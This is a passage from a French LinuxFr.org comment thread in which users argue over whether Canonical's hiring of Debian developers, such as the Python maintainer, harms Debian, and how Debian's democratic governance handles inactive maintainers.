                              Pourquoi faire un fork de Debian alors que la seule chose qui ne pourrait pas être intégré directement dans Debian, c'est le thème et la séléction par défaut des paquets ?
                              • [^] # Commentaire supprimé

                                Posté par . Évalué à 0.

                                Ce commentaire a été supprimé par l'équipe de modération.

                                • [^] # Re: Non Respect

                                  Posté par (page perso) . Évalué à -1.

                                  'ils refusent d'inclure certains logiciels pour des raisons assez bizarre parfois (cf le troll sur le paquet hotbabe...)

                                  Mauvaise foi détectée.

                                  et donc canonical a decide de pousser tout ca et de faire a la linus "release often"

                                  Pourquoi ne pas faire une release de sid tout les 6 mois avec leur thème et leur sélection de paquets ?
                                • [^] # Re: Non Respect

                                  Posté par (page perso) . Évalué à 8.

                                  En ce qui concerne python 2.4, cela a déjà été expliqué de nombreuses fois : la personne qui s'occupe de python sous Debian a été embauchée par Ubuntu, et concentre désormais son travail uniquement sur python dans Ubuntu, délaissant Debian, tout en REFUSANT de lâcher python sous Debian. Résultat : personne d'autre ne peut travailler sur python dans Debian, et on reste avec une version "out-of-date".
                                  LA grande question, c'est pourquoi la personne en question :
                                  - n'abandonne pas le paquet dans Debian (beaucoup de personnes seraient prêtes à l'adopter et à y travailler dessus, il y a même une "team" python qui pourrait le faire)
                                  - ou ne se remette pas à travailler sur son paquet si elle tient réellement à le garder.
                                  Je n'ai malheureusement pas la réponse à cette question, mais il semblerait que Ubuntu aime garder les personnes à des postes importants dans Debian même si ils n'ont plus le temps/l'envie de travailler, afin de garder une certaine mainmise sur la distribution, et c'est l'un des nombreux reproches qui lui est fait.
                                  • [^] # Re: Non Respect

                                    Posté par (page perso) . Évalué à 8.

                                    LA grande question, c'est pourquoi la personne en question :
                                    - n'est pas "démissionnée" d'office ?
                                    • [^] # Re: Non Respect

                                      Posté par . Évalué à 5.

                                      Yep, si il y a tant de bonnes volontés pour s'occuper de Python et que la personne en charge ne s'en occupe plus, c'est clairement un problème organisationnel chez Debian si le travail n'est pas redistribué...
                                      • [^] # Re: Non Respect

                                        Posté par (page perso) . Évalué à 3.

                                        Pour Will Hunting : même question, même réponse : http://linuxfr.org/comments/715690.html#715690 (le commentaire au dessus du mien est au moins aussi informatif :-)

                                        Pour ragoutoutou: non, c'est les deux. Le fait que Debian ait encore du mal à réagir face aux développeurs qui s'accrochent à des paquets essentiels sans travailler dessus n'excuse en aucun cas les développeurs en question. Et quand ces développeurs sont employés par Canonical, qu'on constate que la situation est assez générale (doko n'est pas un cas isolé), cela ne rend en aucun cas le comportement de Canonical vis à vis de Debian légitime ou positif. L'organisation de Debian est loin d'être parfaite, elle déconne même sévèrement sur pas mal de points, mais rendons à Shuttleworth ce qui appartient à Shuttleworth...
                                        • [^] # Re: Non Respect

                                          Posté par . Évalué à 2.

                                          mais rendons à Shuttleworth ce qui appartient à Shuttleworth


                                          A vue de nez, en tout cas, il a l'air de mieux savoir faire tourner sa boutique que l'organisation de Debian en tout cas... Le développeur est peut être inexcusable dans le fait qu'il prétend garder le paquet sous son contrôle, mais si la situation est telle que tu la décris, ça reste l'organisation de Debian qui se montre incapable de gérer la situation.

                                          Faut pas confondre démocratie avec laisser aller et anarchie, il y a une responsabilité des élus face au "peuple".
                                          • [^] # Re: Non Respect

                                            Posté par (page perso) . Évalué à 1.

                                            A vue de nez, en tout cas, il a l'air de mieux savoir faire tourner sa boutique que l'organisation de Debian en tout cas...

                                            Oui. D'ailleurs, une des principales raisons pour lesquelles la Chine connaît une meilleure réussite économique que l'Inde est qu'il s'agit d'un régime autoritaire. Est-ce que la Chine est pour autant un modèle ?

                                            Nul ne contredit le fait que l'organisation démocratique de Debian peut tourner à la bureaucratie. C'est un défi énorme que d'appliquer des structures basées sur le vote et une constitution à un projet libre, et rien n'y est simple : répartition de la gouvernance entre les instances, admission des nouveaux, exclusion, ... : tout est à inventer.

                                            Encore une fois dans ta réponse tu présentes ça comme s'il s'agit d'un développeur isolé : ça n'est pas le cas, il s'agit bien d'une stratégie générale (je ne crois pas que Canonical veuille plomber Debian - je pense en revanche que sa stratégie de recrutement et de gestion du personnel cause de graves difficultés pour Debian, et donc relève du suicide à terme).
                                            • [^] # Re: Non Respect

                                              Posté par . Évalué à 0.

                                              Oui. D'ailleurs, une des principales raisons pour lesquelles la Chine connaît une meilleure réussite économique que l'Inde est qu'il s'agit d'un régime autoritaire. Est-ce que la Chine est pour autant un modèle ?


                                              Ok, d'office, dès qu'il s'agit d'avoir un peu de gestion, un peu d'autorité, c'est la dictature?

                                              Si le projet Debian tient des élections pour désigner qui dirige, c'est pour être dirigé, le fait de laisser partir des pans importants comme Python en couille est clairement un manque de respect pour les autres personnes bossant sur le projet, et particulièrement les personnes bossant sur des éléments dépendant de Python.

                                              Le fait que Ubuntu semble aller plus vite avec des objectifs mieux définis peut représenter un fort attrait pour les développeurs qui, du coup, ont l'impression de mieux voir où ils vont.

                                              Ensuite, le fait que des sociétés engagent des développeurs de logiciels libres et que ceux-ci laissent du coup tomber leur sprojets libres ne date pas d'hier. Un projet de qualité libre ou non, se doit de pouvoir surmonter les abandons/départs/décès pouvant survenir dans les rangs de ses participants.
                                              • [^] # Re: Non Respect

                                                Posté par (page perso) . Évalué à 0.

                                                Ok, d'office, dès qu'il s'agit d'avoir un peu de gestion, un peu d'autorité, c'est la dictature?

                                                Euh... Tu le fais exprès ? Canonical est une entreprise avec un modèle de décision centralisée. Rien à voir avec un projet libre avec une structure démocratique. Ça n'a simplement aucun sens de comparer les deux organisations comme tu le faisais plus haut.

                                                Si le projet Debian tient des élections pour désigner qui dirige, c'est pour être dirigé, le fait de laisser partir des pans importants comme Python en couille est clairement un manque de respect pour les autres personnes bossant sur le projet, et particulièrement les personnes bossant sur des éléments dépendant de Python.

                                                Élire des personnes n'est pas lui donner les pleins pouvoirs. Tu élis un président de la république, ça ne lui donne pas le droit de décider ce qu'il veut sans consulter personne : cela doit être dans ses prérogatives et doit respecter des procédures précises décrites par la loi et la jurisprudence. C'est ce qu'on appelle, en conjonction avec des élections libres et régulières, l'État de droit. Le problème est de définir ces procédures pour qu'elles soient à la fois démocratiques, justes et efficaces. Debian, parce qu'elle a une organisation très originale (projet libre avec Constitution) doit les inventer en permanence, et c'est ce processus que je décrivais dans mon commentaire cité plus haut. Oui, ça se fait parfois au détriment de l'efficacité (bien que parfois ça donne également de l'efficacité) : comme la démocratie est économiquement moins efficace qu'un régime autoritaire (dans une certaine mesure).

                                                Le fait que Ubuntu semble aller plus vite avec des objectifs mieux définis peut représenter un fort attrait pour les développeurs qui, du coup, ont l'impression de mieux voir où ils vont.

                                                Les développeurs d'Ubuntu n'étant généralement pas volontaires (ne pas confondre avec MOTU), la remarque n'a pas de sens.

                                                Ensuite, le fait que des sociétés engagent des développeurs de logiciels libres et que ceux-ci laissent du coup tomber leur sprojets libres ne date pas d'hier.

                                                Et le fait que ce soit vieux le rend bien, souhaitable, efficace ou normal ? C'est de ça qu'on discute.
                                                • [^] # Re: Non Respect

                                                  Posté par (page perso) . Évalué à 2.

                                                  "Les développeurs d'Ubuntu n'étant généralement pas volontaires"

                                                  On les a pas rendus esclaves non plus, je pense qu'ils aiment bien leur boulot....

                                                  "Et le fait que ce soit vieux le rend bien, souhaitable, efficace ou normal ? C'est de ça qu'on discute."

                                                  La chose que j'en tire c'est qu'il ne faut pas pour cela remettre en cause la société qui les emploie mais les personnes elles-même, et au pire l'organisation du projet libre si cela aggrave les choses
                                                  • [^] # Re: Non Respect

                                                    Posté par (page perso) . Évalué à 6.

                                                    On les a pas rendus esclaves non plus, je pense qu'ils aiment bien leur boulot....

                                                    Ça n'est pas la question. Ce sont des salariés, pas des volontaires. C'est pas la même chose que de s'engager dans une association et de se faire embaucher par une boîte.

                                                    La chose que j'en tire c'est qu'il ne faut pas pour cela remettre en cause la société qui les emploie mais les personnes elles-même, et au pire l'organisation du projet libre si cela aggrave les choses

                                                    Tu tires cette conclusion contre tous les arguments, contre tous les faits et sans jamais apporter d'arguments permettant de nier ce que j'ai présenté à de nombreuses reprises. Je maintiens que tu ne vois pas les choses objectivement concernant Canonical.

                                                    Je le répète alors : Canonical embauche les développeurs Debian des paquets qui les intéressent, qui sont souvent des paquets importants (Gnome, Python). Canonical ne laisse pas à ces développeurs une partie de leur temps pour travailler sur Debian (NB: Progeny, par exemple, le faisait). Au contraire, vu les effectifs de Canonical et les décisions sur les délais, l'expérience montre qu'un développeur Ubuntu y passe énormément de temps et devient à peu près injoignable pour Debian (j'ai, outre doko, quatre autres noms en tête que je te communiquerai volontiers, mais en privé : je ne fais pas dans la dénonciation). Cependant, la raison pour laquelle Canonical embauche ces développeurs et que (1) ils les connaissent bien (et Debian avec) (2) cela leur permet de contrôler les paquets dans Debian (pour qu'il y ait pas trop de drift, pour que les bugs et bug fixes soient remontés, etc.). Donc ces développeurs restent maintainers des paquets en question. La combinaison du manque de temps et de ces derniers faits fait qu'on a systématiquement des problèmes avec des développeurs qui deviennent inactifs et qui sont pourtant là. Ces problèmes sont pas très graves quand la maintenance est assuré par des équipes (Gnome, ...) (cependant, il y a toujours le problème non négligeable de perdre d'un coup la personne qui a réalisé les paquets et les connaît, et qu'elle ne soit le plus souvent plus joignable), mais nettement plus emmerdants quand les paquets sont maintenus par un seul développeur. La personnalité du développeur ne fait que rajouter à ce problème qui est général et très clairement inhérent à la stratégie de Canonical.

                                                    Encore une fois, le fait que Debian ait encore des difficultés à gérer le fait qu'on lui tire une balle dans le pied ne renvoie en aucun cas la responsabilité du coup de feu à Debian. Ce serait être d'une mauvaise foi fabuleuse de l'affirmer, à tel point que ça en devient assez immonde.
                                                    • [^] # Re: Non Respect

                                                      Posté par (page perso) . Évalué à -1.

                                                      Tu parles de stratégie de canonical, mais la(les) question que je me pose toujours est :
                                                      Quelle est cette stratégie que vous annoncez ?
                                                      Pensez-vous vraiment que canonical cherche à controller debian, et qu'elle s'y prendrai ainsi ?
                                                      Comment canonical "controle" les paquets debian? La, je vois aucun contrôle, juste un ralentissement.

                                                      Puis tu parles de progeny mais si je me souviens bien progeny ne sortait pas de distrib (des solutions complètes pour les entreprises je crois), du moins pas un fork de debian, donc ce n'est pas la même chose.

                                                      La raison d'après moi pour que canonical embauche des devs debian, c'est que ce sont les plus aptes à faire une distrib debian-based, c'est tout !

                                                      Et note je n'ai personellement jamais "accusé" l'organisation de debian (bien que j'ai emis des doutes), seulement des devs.
                                                      • [^] # Re: Non Respect

                                                        Posté par (page perso) . Évalué à 1.

                                                        Quelle est cette stratégie que vous annoncez ?

                                                        Comme je l'ai dit et répété, je pense pas que Canonical cherche à contrôler Debian. Canonical cherche à faire une distrib' et à faire des profits, c'est une évidence. Cependant, c'est sa stratégie, son business plan, si tu veux, qui a les conséquences néfastes que je disais. Et effectivement, sa stratégie, notamment sa stratégie de recrutement, c'est : je recrute des développeurs Debian qui bossent déjà sur les paquets qui m'intéressent, et je les fais bosser sur les paquets Ubuntu. Il est souhaitable qu'ils continuent de bosser sur ces paquets, comme ça ils sont plus à même de faire remonter les bugs de chez Debian et il n'y a pas de drift considérable (ce qui pourrait rendre le reste des packages incompatibles et poserait problème).

                                                        Sauf que ça a l'effet pervers que j'indiquais plus haut. Effet pervers extrêmement nocif pou Debian et donc à terme pour Ubuntu. Et directement inhérent à la stratégie de Canonical...

                                                        Puis tu parles de progeny mais si je me souviens bien progeny ne sortait pas de distrib

                                                        Progeny sortait une distribution dérivée de Debian, si. Avant de se spécialiser presque entièrement sur le service et le sur-mesure. Elle embauchait même des développeurs Debian (dont Branden, par exemple) pour travailler sur cette distribution dérivée.
                                                • [^] # Re: Non Respect

                                                  Posté par . Évalué à 0.


                                                  Euh... Tu le fais exprès ? Canonical est une entreprise avec un modèle de décision centralisée. Rien à voir avec un projet libre avec une structure démocratique. Ça n'a simplement aucun sens de comparer les deux organisations comme tu le faisais plus haut.


                                                  Au niveau efficacité, ça mérite comparaison, surtout quand on voit debian buter sur des problèmes aussi simples que quelqu'un qui ne fait pas son boulot.

                                                  Qu'on ne donne pas les pleins pouvoirs à une personne dans une démocratie, c'est normal, toutefois, il est aussi normal de donner aux gens des pouvoirs à la mesure de leurs responsabilités, quitte à ce que celà fasse l'objet d'un vote en petit commité.

                                                  Le fait que le modèle démocratique Debian soit incapable de gérer un problème aussi simple est consternant.

                                                  Et le fait que ce soit vieux le rend bien, souhaitable, efficace ou normal ? C'est de ça qu'on discute.


                                                  Le fait que ce soit ancien et fréquent en fait que c'est une chose normale et que tout projet (même non informatique) devrait pouvoir surmonter. Dans un système basé sur le bénévolat, les développeurs n'appartiennent pas à un projet ou à un autre, ils participent selon leurs disponnibilités.
                                                  • [^] # Re: Non Respect

                                                    Posté par (page perso) . Évalué à 1.

                                                    Tu ne réponds pas à la question, que tu laisses de côté en remontant les problèmes d'organisation de Debian qui sont hors sujet. Le fait qu'une boîte qui utilise le travail de Debian amène des dizaines de développeurs à ne pas faire leur boulot et à rester en place pour autant est de la responsabilité de la boîte, ici de Canonical. Ça n'est pas de la responsabilité de Debian. Debian apprend à mieux s'en sortir par rapport à ça comme je le disais avant, mais le problème est du côté de Canonical ! C'est une évidence, et tu n'as jamais rien apporté pour la nier. Argumente !

                                                    Le fait que le modèle démocratique Debian soit incapable de gérer un problème aussi simple est consternant.

                                                    Problème simple ? Problème tellement simple qu'il fait l'objet de controverse dans toute association, dans la société et qu'il n'a jamais été réglé en matière d'institutions républicaines ? Le problème de l'éviction de quelqu'un d'une responsabilité qu'il a acquise est loin d'être un problème simple. Tu remarqueras qu'il n'existe en France pas de procédure de destitution du président, par exemple : de qui devrait-elle émaner ? dans quelles conditions ? quels sont les critères objectifs qui permettent d'engager cette procédure ? De qui la légitimité de la destitution doit-elle venir ? Il existe tout au plus une procédure de défiance du Gouvernement, qui par le fait majoritaire est à peu près impraticable depuis longtemps. Dans les associations, dans les partis politiques, la règle la plus compliquée à déterminer et à appliquer est celle de l'exclusion : elle est aussi la décision la plus attaquée en justice. Qui plus est, on peut dire que les exclusions n'ont pas bonne presse dans l'opinion, ce qui montre que le problème est loin d'être si tranché...

                                                    Si le problème est si simple, je t'en prie : examine le cas de doko, qui répond encore aux mails mais ne travaille plus sur ses paquets, et montre nous une procédure qui résolve ce problème, pourrait ne pas permettre à n'importe qui d'évincer n'importe qui alors qu'il a simplement une baisse d'activité, respecterait la constitution (ou ne demanderait pas de la changer complètement, du moins) et ne demanderait pas des mois ? Je t'en prie, fais. Au passage, si tu peux faire la même chose pour un parti politique, ça m'arrangerait.

                                                    Le fait que ce soit ancien et fréquent en fait que c'est une chose normale

                                                    Choisis tes mots. Le viol est une chose ancienne et fréquente, elle n'est pas normale.

                                                    Dans un système basé sur le bénévolat, les développeurs n'appartiennent pas à un projet ou à un autre, ils participent selon leurs disponnibilités.

                                                    C'est hors sujet : il existe le NMU et la procédure MIA pour ces cas là, comme je l'ai expliqué. On parle de cas où le maintainer est inactif mais encore assez pour exiger qu'il reste maintainer, donc d'un cas d'obstruction manifeste. Ce n'est pas un cas simple (parce qu'il n'y a pas de critère simple et général d'évaluation du fait qu'il est inactif, parce que savoir de qui relève légitimement la décision est loin d'être évident, etc.).
                                                    • [^] # Re: Non Respect

                                                      Posté par . Évalué à -1.

                                                      Le fait est que plus je te lis, plus je trouve la situation ridicule.

                                                      La responsabilité première n'est pas chez la boîte qui embauche une personne, mais bien chez la personne qui n'assure pas ses autres engagements. Ce n'est pas la responsabilité de Canonical si un bénévole de Debian ne tient pas ses engagements.

                                                      Ensuite, la responsabilité revient aux chefs de projet de déterminer si une personne remplit encore ses engagements, et le cas échéant prendre les mesures ad hoc pour assurer la pérennité du projet: p-ex, envoyer un mail donnant une deadline claire au delà de laquelle la personne sera déchargée de facto de sa responsabilité, celle-ci étant redistribuée vers des volontaires plus enthousiastes.

                                                      Mais bon, à priori, comme chez Debian, tout doit faire l'objet de procédures, il faut en conclure que les gens ont trop peur de donner le moindre pouvoir à qui que ce soit. L'art de faire très compliqué quand on peut faire simple?

                                                      Problème simple ? Problème tellement simple qu'il fait l'objet de controverse dans toute association, dans la société et qu'il n'a jamais été réglé en matière d'institutions républicaines ? Le problème de l'éviction de quelqu'un d'une responsabilité qu'il a acquise est loin d'être un problème simple.


                                                      C'est un problème simple: soit on garde le mainteneur, soit on lui retire sa responsabilité. Maintenant, la décision peut être plus ou moins difficile à prendre selon la qualité de l'organisation, la définition des responsabilités dans l'entreprise.

                                                      Enfin, il faudrait un peu revenir sur terre quand il s'agit de mesurer les responsabilités, l'interchangeabilité des personnes, quand il s'agit de garder un projet communautaire à flot.

                                                      Debian est un projet communautaire, pas une république.
                                                      • [^] # Re: Non Respect

                                                        Posté par (page perso) . Évalué à 1.

                                                        J'arrête de répondre sur l'organisation de Debian. Tu t'es mis en tête que Debian n'a rien de spécifique, qu'il s'agit d'un projet comme un autre. Tu t'obstines aux comparaisons avec les entreprises, ce qui est un non-sens. Quant aux arguments poujadistes sur les procédures... on est passé en dessous de la barre de ce qui mérite une réponse.

                                                        La responsabilité première n'est pas chez la boîte qui embauche une personne, mais bien chez la personne qui n'assure pas ses autres engagements. Ce n'est pas la responsabilité de Canonical si un bénévole de Debian ne tient pas ses engagements.

                                                        Ils ont été embauchés par Canonical parce qu'ils étaient développeurs Debian. Ils restent développeurs Debian parce que c'est la volonté de Canonical. Mais ils ne peuvent pas tenir leurs engagements parce que Canonical ne leur permet pas.

                                                        Ce n'est pas un problème individuel. C'est le problème de Canonical.
                                                        • [^] # Re: Non Respect

                                                          Posté par . Évalué à 2.

                                                          Et il aurait été embauché par Pizza Hut, on aurait blâmé Pizza Hut?

                                                          Le problème est-il le fait qu'il ait accepté un emploi ou qu'il n'ait pas tenu ses engagements envers Debian?

                                                          Tu t'obstines aux comparaisons avec les entreprises, ce qui est un non-sens.


                                                          Comparer Debian avec une république est certainement un plus grand nonsens...

                                                          Pour ce qui est des procédures, c'est beau d'en avoir, c'est très bien, mais celà ne doit pas devenir un frein à la survie d'un projet. Au lieu de blâmer Canonical de tous les maux de Debian, il serait plutôt temps de se sortir les doigts du cul et d'agir pour préserver le bon fonctionnement de Debian. Cannonical n'aide certainement pas, mais il n'est pas non-plus la source du problème, juste un amplificateur.
                                                          • [^] # Re: Non Respect

                                                            Posté par (page perso) . Évalué à 0.

                                                            Et il aurait été embauché par Pizza Hut, on aurait blâmé Pizza Hut?

                                                            Pizza Hut fait une distribution dérivée de Debian ? Pizza Hut a pour stratégie de recruter des développeurs Debian ? Pizza Hut recrute des développeurs Debian parce qu'ils maintiennent des paquets dans Debian ?

                                                            Compare ce qui est comparable.

                                                            Comparer Debian avec une république est certainement un plus grand nonsens...

                                                            Et pourtant... quand, en sociologie politique, on étudie la Nation et la République, on l'étudie de façon comparative avec ce qui existe aux échelles plus petites, notamment les communautés, les associations. Les réflexions sur les procédures et instances démocratiques à l'intérieur de ces petites structures reflètent souvent les problèmes d'ensemble au niveau des États, parce qu'ils relèvent de la même construction. Serais-tu en train d'insinuer que l'ensemble des sciences politiques est un non sens ?

                                                            Le reste est comme d'habitude simplement insultant et en dessous du niveau de la mer point de vue intellectuel. Juste pour note : il existe des gens qui placent la démocratie avant l'efficacité. Quels enculés d'intégristes, ces démocrates !@#
                                                            • [^] # Re: Non Respect

                                                              Posté par . Évalué à 3.

                                                              Pizza Hut fait une distribution dérivée de Debian ? Pizza Hut a pour stratégie de recruter des développeurs Debian ? Pizza Hut recrute des développeurs Debian parce qu'ils maintiennent des paquets dans Debian ?


                                                              Canonical interdit-il à ses développeurs de participer à Debian? C'est plutôt ça, la question.

                                                              La deuxième question est Canonical oblige t'il ses développeurs à mener les responsables debian en bateau?

                                                              En dépit de toutes tes envolées, il n'y a rien dans ce que tu as raconté qui prouve en véritable rapport de cause à effet.

                                                              Un peu d'honnêteté intellectuelle ne ferait pas de mal...

                                                              Et pourtant... quand, en sociologie politique, on étudie la Nation et la République, on l'étudie de façon comparative avec ce qui existe aux échelles plus petites, notamment les communautés, les associations. Les réflexions sur les procédures et instances démocratiques à l'intérieur de ces petites structures reflètent souvent les problèmes d'ensemble au niveau des États, parce qu'ils relèvent de la même construction. Serais-tu en train d'insinuer que l'ensemble des sciences politiques est un non sens ?


                                                              Non, les sciences po, c'est très utile, et c'est très louable de faire une simulation politique à grande échelle, et de manière internationnale.

                                                              Maintenant, il faut bien se rendre compte que faire cette simulation dans le cadre d'un projet informatique est un choix, un choix à assumer, de même que les dysfonctionnements liés à l'élaboration du modèle politique.
                                                              De même, si la simulation politique prend plsu de poid dans le développement de Debian que l'aspect distribution en lui-même, il est normal de voir des informaticiens sans ambitions politiques tourner les talons et aller vouir ailleurs.
                                                              • [^] # Re: Non Respect

                                                                Posté par (page perso) . Évalué à 1.

                                                                Canonical interdit-il à ses développeurs de participer à Debian? C'est plutôt ça, la question.

                                                                Non, Canonical ne leur permet juste pas de le faire en terme de temps.

                                                                La deuxième question est Canonical oblige t'il ses développeurs à mener les responsables debian en bateau?

                                                                Qui a parlé de mener les responsables Debian en bateau ? Tu inventes.

                                                                En dépit de toutes tes envolées, il n'y a rien dans ce que tu as raconté qui prouve en véritable rapport de cause à effet.

                                                                N'importe qui pourra revenir quelques commentaires plus haut et voir un paragraphe qui explique justement le rapport de cause à effet entre l'action d'Ubuntu et les conséquences sur Debian. Tu as choisi de ne pas y répondre : très bien, mais c'est choisir de ne rien apporter à l'argumentation.

                                                                Un peu d'honnêteté intellectuelle ne ferait pas de mal...

                                                                L'honnêteté intellectuelle qui te pousse à répondre systématiquement à côté, le plus souvent sans citation complète ? Ou à ignorer consciencieusement des parties entières de mes commentaires ? Tu parles de celle-là, ou d'une autre encore connue de toi seul ?

                                                                Non, les sciences po, c'est très utile, et c'est très louable de faire une simulation politique à grande échelle, et de manière internationnale.

                                                                Qui parle de simulation ? Il s'agit simplement de mettre en place un projet libre basé sur des principes démocratiques, pas d'une simulation de quoi que ce soit.

                                                                De même, si la simulation politique prend plsu de poid dans le développement de Debian que l'aspect distribution en lui-même, il est normal de voir des informaticiens sans ambitions politiques tourner les talons et aller vouir ailleurs.

                                                                Sauf que ça n'est pas ce qui se passe. Hors-sujet total.
                                                                • [^] # Re: Non Respect

                                                                  Posté par . Évalué à 2.

                                                                  Non, Canonical ne leur permet juste pas de le faire en terme de temps.


                                                                  Jusqu'à preuve du contraire, ils le font sur leur temps libre, c'est comme ça que fonctionnent la plupart des développeurs du logiciel libre.
                                                                  Canonical ne va tout de même pas payer ses développeurs pour maintenir les paquets Debian en plus de ceux pour Ubuntu.

                                                                  Qui a parlé de mener les responsables Debian en bateau ? Tu inventes.


                                                                  Ben à priori, si on s'en réfère à ta version des faits, le mainteneur de python mène les responsables debian en bateau: il dit "oui, je vais le faire, je garde la responsabilité" mais ne fait pas ce pour quoi il s'est engagé... donc oui, ça s'appelle mener le monde en bateau,...

                                                                  N'importe qui pourra revenir quelques commentaires plus haut et voir un paragraphe qui explique justement le rapport de cause à effet entre l'action d'Ubuntu et les conséquences sur Debian.


                                                                  Faudra que tu te re-cites, je n'ai vu de ta part autre-chose que "c'est la faute de Canonical, ils embauchent des développeurs Debian... " c'est donc plutôt toi qui semble choisir la non-argumentation.

                                                                  Sauf que ça n'est pas ce qui se passe.

                                                                  et ceux qui vont chez canonical ? ;)
                                                                  • [^] # Re: Non Respect

                                                                    Posté par (page perso) . Évalué à 3.

                                                                    Canonical ne va tout de même pas payer ses développeurs pour maintenir les paquets Debian en plus de ceux pour Ubuntu.

                                                                    C'est vrai, ça serait inacceptable qu'Ubuntu, en tant que distribution dérivée de Debian, participe à Debian alors qu'elle n'en retire que la grande majorité des packages, la formation de ses employés et la plus grande partie du travail de maintenance. Ce serait parfaitement immoral !

                                                                    Faudra que tu te re-cites, je n'ai vu de ta part autre-chose que "c'est la faute de Canonical, ils embauchent des développeurs Debian... "

                                                                    Mauvais oeil, changer d'oeil.

                                                                    Je le répète alors : Canonical embauche les développeurs Debian des paquets qui les intéressent, qui sont souvent des paquets importants (Gnome, Python). Canonical ne laisse pas à ces développeurs une partie de leur temps pour travailler sur Debian (NB: Progeny, par exemple, le faisait). Au contraire, vu les effectifs de Canonical et les décisions sur les délais, l'expérience montre qu'un développeur Ubuntu y passe énormément de temps et devient à peu près injoignable pour Debian (j'ai, outre doko, quatre autres noms en tête que je te communiquerai volontiers, mais en privé : je ne fais pas dans la dénonciation). Cependant, la raison pour laquelle Canonical embauche ces développeurs et que (1) ils les connaissent bien (et Debian avec) (2) cela leur permet de contrôler les paquets dans Debian (pour qu'il y ait pas trop de drift, pour que les bugs et bug fixes soient remontés, etc.). Donc ces développeurs restent maintainers des paquets en question. La combinaison du manque de temps et de ces derniers faits fait qu'on a systématiquement des problèmes avec des développeurs qui deviennent inactifs et qui sont pourtant là. Ces problèmes sont pas très graves quand la maintenance est assuré par des équipes (Gnome, ...) (cependant, il y a toujours le problème non négligeable de perdre d'un coup la personne qui a réalisé les paquets et les connaît, et qu'elle ne soit le plus souvent plus joignable), mais nettement plus emmerdants quand les paquets sont maintenus par un seul développeur. La personnalité du développeur ne fait que rajouter à ce problème qui est général et très clairement inhérent à la stratégie de Canonical.
                                                                    • [^] # Re: Non Respect

                                                                      Posté par . Évalué à 1.

                                                                      cqfd...

                                                                      pour résumer clairement, il y a deux faces au problème:

                                                                      - la relation entre le développeur et Debian

                                                                      - la relation entre Canonical et Debian

                                                                      Dans le premier cas, il ne faut pas se leurrer, d'autres sociétés que canonical sont susceptibles d'embaucher des développeurs Debian, les rendant moins, voir pas du tout disponibles pour Debian. C'est un problème à règler entre les développeurs et les gestionnaires de Debian.

                                                                      Dans le second cas, c'est un problème d'accords entre Canonical et Debian: à quoi Canonical s'est-il engagé auprès de Debian?

                                                                      Canonical monopolisant les développeurs Debian?
                                                                      Oui, forcément, ils cherchent des spécialistes en Debian pour faire tourner Ubuntu...

                                                                      Embaucher un développeur Debian est-il un mal?
                                                                      Si Debian n'a pas fait signer de contrat de non-concurrence à ses développeurs, il faut accepter que ceux-ci aillent chez la 'concurrence' ... en plus entre un boulot bénévole et un boulot payé, pas mal de développeurs vont vite faire leur choix...

                                                                      Debian en manque de bonnes volontés pour reprendre le flambeau?
                                                                      Non.
                                                                      • [^] # Re: Non Respect

                                                                        Posté par . Évalué à 2.

                                                                        Extraits de http://www.ubuntu.com/ubuntu/relationship :

                                                                        Many Ubuntu developers are also recognized members of the Debian community. They continue to stay active in contributing to Debian both in the course of their work on Ubuntu and directly in debian.

                                                                        Second, Ubuntu includes a number of full-time contributors who are also Debian developers. Many of the other distributions that use Debian-style packaging do not include any active debian contributors.
                                                                        • [^] # Re: Non Respect

                                                                          Posté par . Évalué à 0.

                                                                          Effectivement, c'est bien là le point où on peut attaquer ubuntu: des promesses, des promesses...

                                                                          Pour la première partie, Ubuntu n'a pas le pouvoir de garantir le fait que les développeurs Ubuntu (salariés ou bénévoles) contribuent aussi à Debian, à moins de les payer pour le faire...

                                                                          Pour la seconde partie, qui fait justement aux développeurs salariés, aucune promesse n'est faite...

                                                                          Ce que la communauté Debian aurait sans doutes voulu voir, c'est l'inverse: un engagement sur le temps consacré à Debian par le personnel salarié plein temps.
                                                        • [^] # Re: Non Respect

                                                          Posté par (page perso) . Évalué à 2.

                                                          "Ils restent développeurs Debian parce que c'est la volonté de Canonical. "

                                                          Tu as des sources à ce niveau la?
                                                          • [^] # Re: Non Respect

                                                            Posté par (page perso) . Évalué à 0.

                                                            je sais pas si tu te rends compte qu'avec les arguments postés ici dans d'autres threads, un argumentaire comme celui vous tenez ressemble à de la mauvaise foi et à une espèce de rivalité que peuvent avoir les ados de 14 ans envers leurs parents. Ils vont jusqu'à se couvrir de ridicule avec des arguments complètement des délirants pour avoir le dernier mot et remettre en cause l'autorité ou même la vérité.

                                                            Mais bon ça en est assez risible et assez intéressant.

                                                            pour en revenir à à ta ridicule question :
                                                            Tu as des sources à ce niveau la?

                                                            non, personne n'a un acte écrit de Mark S. qui dise 'on va prendre le contrôle de Debian', on se base sur des faits tangibles et on en tire des conclusions qui ne sont même pas soumise à interprétation tellement c'est évident.

                                                            tous ça en deviens vraiment idiot, mais bon nous verront comment cela tourne, et on ressortira tous vos commentaires bien idiots et bien plein de mauvaise foi pour en faire (beaucoup) de fortunes.

                                                            M.
                                                            • [^] # Re: Non Respect

                                                              Posté par . Évalué à 2.

                                                              je sais pas si tu te rends compte qu'avec les arguments postés ici dans d'autres threads, un argumentaire comme celui vous tenez ressemble à de la mauvaise foi et à une espèce de rivalité que peuvent avoir les ados de 14 ans envers leurs parents. Ils vont jusqu'à se couvrir de ridicule avec des arguments complètement des délirants pour avoir le dernier mot et remettre en cause l'autorité ou même la vérité.


                                                              ce qui est drôle, c'est que tu décris ta propre attitude :)
                                              • [^] # Re: Non Respect

                                                Posté par (page perso) . Évalué à 4.

                                                Oui, mais justement, dans le cas des "abandons/départs/décès", il y a des procédures définies (par exemple, une personne s'en allant de son plein grès devrait suivre la procédure [1], et pour les personnes ne répondant plus, et ne semblant plus travailler sur leur paquets, il y a la procédure [2]), mais là on parle de mainteneurs restant volontairement en place, répondant aux mails, refusant d'abandonner leur paquets, mais ne les maintenant plus. Il faudrais dans ce cas leur "reprendre de force" les paquets ? Mais dans ce cas, comment déterminer quand il est nécessaire de reprendre un paquet ? Qui décide si un paquet doit être repris ?
                                                Un début de solution a été proposé en incitant au travail en "teams" sur les paquets importants. Cela se met en place lentement, mais j'espère que cela permettra de résoudre une partie de ce problème dans les années à vanir.


                                                [1] : http://www.debian.org/doc/developers-reference/ch-developer-(...)
                                                [2] : http://www.debian.org/doc/developers-reference/ch-beyond-pkg(...)
                                                • [^] # Re: Non Respect

                                                  Posté par . Évalué à 0.

                                                  Il faudrais dans ce cas leur "reprendre de force" les paquets ?


